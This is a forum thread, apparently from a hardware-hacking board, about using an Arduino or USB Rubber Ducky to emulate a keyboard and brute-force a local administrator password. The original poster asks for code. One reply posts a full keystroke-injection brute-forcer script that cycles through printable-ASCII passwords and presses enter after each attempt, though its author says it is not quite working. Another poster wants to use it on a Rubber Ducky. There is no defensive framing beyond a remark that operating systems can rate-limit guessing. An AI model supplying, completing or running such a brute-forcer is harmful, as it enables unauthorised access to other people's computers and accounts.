Jonny_Walked Posted July 26, 2010 Share Posted July 26, 2010 Hey guys, I'm just wondering if I was able to make a code with Arduino to generate passwords, then use them to attempt to bruteforce an admin account locally. As in: Generate password, input "administrator" - (username) tab, input password value, enter enter. repeat until access is granted. I am also considering using a wordlist, any links or even code on how to implement this would be great. Thanks in advance. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted July 26, 2010 Share Posted July 26, 2010 This is very possible. All depends on your coding skills to have it generate passwords on the fly. There are other alternatives to getting passwords though if you have physical access. Quote Link to comment Share on other sites More sharing options...
Paul Stoffregen Posted July 27, 2010 Share Posted July 27, 2010 Even if the operating system does nothing to limit the speed of your guessing (which it easily can and certainly should), USB keyboards at 12 Mbit/sec are limited to 1000 state changes per second, due to the design of the HID protocol. Each keystroke is usually implemented as 2 events, a key down and key up. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted July 27, 2010 Share Posted July 27, 2010 Varies more with the response time of the computer. Think of it as OLD SCHOOL programming when there were no "sleep" statements. it was just code your program to work in the speed limits of the computer. Quote Link to comment Share on other sites More sharing options...
HaDAk Posted August 15, 2010 Share Posted August 15, 2010 I've been working on some code to do some brute forcing, but I can't seem to get it quite right. You're welcome to take a look at it, but if you fix it and get it working properly, I'd really appreciate it coming back to me. // Simple Bruteforcer v0.1 // by HaDAk // Special thanks to Kevin B. and Carl V. // Variables int ascii = 32; // 32 - 126 int digit = 1; int blinkcount = 0; int MAX_PASSWORD = 32; void setup() { // Blink when the ducky is first plugged in, to verify power to it. while(blinkcount < 2){ blink(50); blinkcount++; } delay(1000); // wait a second hax(128); } void loop() { } void blink(int time){ pinMode( PIN_D6, OUTPUT ); // set LED to super bright digitalWrite(PIN_D6, HIGH); // LED on delay(time); // Slow blink digitalWrite(PIN_D6, LOW); // LED off delay(time); } void enter(){ // Press the enter key, and release it Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void hax(int n){ char curpw[MAX_PASSWORD]; for(int i = 0; i < MAX_PASSWORD; ++i) curpw[i] = '\0'; curpw[0] = 32; while(true) { try_password(curpw,n); curpw[0]++; char *test = &curpw[0]; while (*test > (char)126) { if (curpw[MAX_PASSWORD-1] > (char)126) { return; } *test = 32; test++; (*test)++; if (*test < 32) *test = 32; } } } void try_password(char* curpw, int n){ for(int i=0;i<n;i++){ Keyboard.print(curpw[i]); } delay(50); enter(); } Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted February 28, 2013 Share Posted February 28, 2013 is it also possible for the newer duckys? because normally i use ophcrack cd's and such.. but i just got my rubber ducky.. so that would even be better to just put it in and it immediatly starts bruteforcing! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.